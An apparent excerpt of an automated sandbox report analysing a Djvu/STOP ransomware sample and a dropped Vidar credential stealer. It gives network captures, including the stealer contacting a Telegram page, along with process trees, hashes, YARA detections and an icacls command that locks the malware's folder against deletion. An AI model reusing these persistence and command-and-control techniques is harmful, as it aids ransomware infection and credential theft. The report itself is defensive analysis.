2022-03-29 04:51:48 UTC	4	IN	HTTP/1.1 429 Too Many Requests Date: Tue, 29 Mar 2022 04:51:48 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2022-03-29 04:51:48 UTC	5	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.7	49792	149.154.167.99	443	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe

Timestamp	kBytes transferred	Direction	Data
2022-03-29 04:51:49 UTC	5	OUT	GET /hi20220328 HTTP/1.1 Host: t.me
2022-03-29 04:51:49 UTC	5	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 29 Mar 2022 04:51:49 GMT Content-Type: text/html; charset=utf-8 Content-Length: 9163 Connection: close Set-Cookie: stel_ssid=8706b330597090a84d_9491190590093152020; expires=Wed, 30 Mar 2022 04:51:49 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=35768000
2022-03-29 04:51:49 UTC	6	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 68 69 32 30 32 32 30 33 32 38 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 69 32 30 32 32 30 33 32 38 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @hi20220328</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="hi20220328"><meta property="og:

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Q5W0I0pzFI.exePID: 6988, Parent PID: 5756

General

Target ID:	0
Start time:	06:51:05
Start date:	29/03/2022
Path:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Q5W0I0pzFI.exe"
Imagebase:	0x400000
File size:	803840 bytes
MD5 hash:	78ADA58842629A7C72F4FFA09877332D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.372586217.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: Q5W0I0pzFI.exePID: 6496, Parent PID: 6988

General

Target ID:	2
Start time:	06:51:08
Start date:	29/03/2022
Path:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Q5W0I0pzFI.exe"
Imagebase:	0x400000
File size:	803840 bytes
MD5 hash:	78ADA58842629A7C72F4FFA09877332D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000002.00000000.369557747.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.369557747.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000000.369557747.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000002.00000000.370049298.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.370049298.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000000.370049298.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000002.00000000.368979177.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.368979177.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000000.368979177.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000002.00000000.368447037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.368447037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000000.368447037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000002.00000000.370467390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.370467390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000000.370467390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: icacls.exePID: 7052, Parent PID: 6496

General

Target ID:	5
Start time:	06:51:14
Start date:	29/03/2022
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	icacls "C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Imagebase:	0x8f0000
File size:	29696 bytes
MD5 hash:	FF0D1D4317A44C951240FAE75075D501
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: Q5W0I0pzFI.exePID: 2420, Parent PID: 6496

General

Target ID:	6
Start time:	06:51:15
Start date:	29/03/2022
Path:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Q5W0I0pzFI.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	803840 bytes
MD5 hash:	78ADA58842629A7C72F4FFA09877332D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.398998992.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: Q5W0I0pzFI.exePID: 2624, Parent PID: 1108

General

Target ID:	7
Start time:	06:51:16
Start date:	29/03/2022
Path:	C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe --Task
Imagebase:	0x400000
File size:	803840 bytes
MD5 hash:	78ADA58842629A7C72F4FFA09877332D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.418950342.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: Q5W0I0pzFI.exePID: 1516, Parent PID: 2420

General

Target ID:	8
Start time:	06:51:18
Start date:	29/03/2022
Path:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Q5W0I0pzFI.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x7ff7e8070000
File size:	803840 bytes
MD5 hash:	78ADA58842629A7C72F4FFA09877332D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000008.00000000.396193499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000000.396193499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000000.396193499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000008.00000000.396613760.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000000.396613760.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000000.396613760.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000008.00000000.397769175.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000000.397769175.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000000.397769175.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000008.00000000.395607853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000000.395607853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000000.395607853.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000008.00000000.397205913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000000.397205913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000000.397205913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: Q5W0I0pzFI.exePID: 6452, Parent PID: 2624

General

Target ID:	9
Start time:	06:51:25
Start date:	29/03/2022
Path:	C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe --Task
Imagebase:	0x400000
File size:	803840 bytes
MD5 hash:	78ADA58842629A7C72F4FFA09877332D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.409130512.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.409130512.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.409130512.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000002.440072220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000002.440072220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000002.440072220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.410741803.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.410741803.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.410741803.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.410091603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.410091603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.410091603.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.411271784.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.411271784.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.411271784.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.412392232.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.412392232.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.412392232.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: Q5W0I0pzFI.exePID: 6444, Parent PID: 3808

General

Target ID:	10
Start time:	06:51:26
Start date:	29/03/2022
Path:	C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe" --AutoStart
Imagebase:	0x400000
File size:	803840 bytes
MD5 hash:	78ADA58842629A7C72F4FFA09877332D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.419401145.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: Q5W0I0pzFI.exePID: 4356, Parent PID: 6444

General

Target ID:	11
Start time:	06:51:29
Start date:	29/03/2022
Path:	C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe" --AutoStart
Imagebase:	0x400000
File size:	803840 bytes
MD5 hash:	78ADA58842629A7C72F4FFA09877332D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000B.00000000.413315089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000000.413315089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000000.413315089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000B.00000000.417180790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000000.417180790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000000.417180790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000B.00000000.413797668.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000000.413797668.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000000.413797668.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000B.00000000.414793604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000000.414793604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000000.414793604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000B.00000002.427127192.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000002.427127192.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000002.427127192.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000B.00000000.416333867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000000.416333867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000000.416333867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: build2.exePID: 3232, Parent PID: 1516

General

Target ID:	14
Start time:	06:51:34
Start date:	29/03/2022
Path:	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe"
Imagebase:	0x400000
File size:	631808 bytes
MD5 hash:	1B28A890F243870FE2292DB97E0DC6A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.443184241.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000E.00000002.443184241.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: Q5W0I0pzFI.exePID: 3884, Parent PID: 3808

General

Target ID:	15
Start time:	06:51:35
Start date:	29/03/2022
Path:	C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe" --AutoStart
Imagebase:	0x400000
File size:	803840 bytes
MD5 hash:	78ADA58842629A7C72F4FFA09877332D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000F.00000002.447804234.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: build2.exePID: 2304, Parent PID: 3232

General

Target ID:	16
Start time:	06:51:38
Start date:	29/03/2022
Path:	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe"
Imagebase:	0x400000
File size:	631808 bytes
MD5 hash:	1B28A890F243870FE2292DB97E0DC6A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_Vidar, Description: Detects Vidar / ArkeiStealer, Source: 00000010.00000000.440544094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_Vidar, Description: Detects Vidar / ArkeiStealer, Source: 00000010.00000000.440042728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000000.441196646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000000.441196646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000010.00000000.441196646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_Vidar, Description: Detects Vidar / ArkeiStealer, Source: 00000010.00000000.441196646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_Vidar, Description: Detects Vidar / ArkeiStealer, Source: 00000010.00000002.536453071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.536897185.0000000000788000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: Q5W0I0pzFI.exePID: 4892, Parent PID: 3884

General

Target ID:	17
Start time:	06:51:39
Start date:	29/03/2022
Path:	C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe" --AutoStart
Imagebase:	0x400000
File size:	803840 bytes
MD5 hash:	78ADA58842629A7C72F4FFA09877332D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
